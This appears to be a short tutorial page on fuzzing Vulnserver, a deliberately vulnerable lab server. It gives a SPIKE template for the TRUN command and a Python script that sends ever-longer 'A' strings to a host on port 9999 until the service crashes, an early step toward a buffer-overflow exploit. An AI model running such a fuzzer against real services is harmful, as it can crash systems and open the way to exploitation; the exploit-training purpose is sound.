Vulnserver
s_readline();
s_string("TRUN ");
s_string_variable("0");#!/usr/bin/python
import socket
import sys
from time import sleep
buff = "A" * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.105",9999))
s.send('TRUN /.:/' + buff)
s.close()
sleep(1)
buff = buff + "A" * 100
except:
print "Fuzzing crashed at %s bytes" % str(len(buff))
sys.exit()Last updated
Was this helpful?
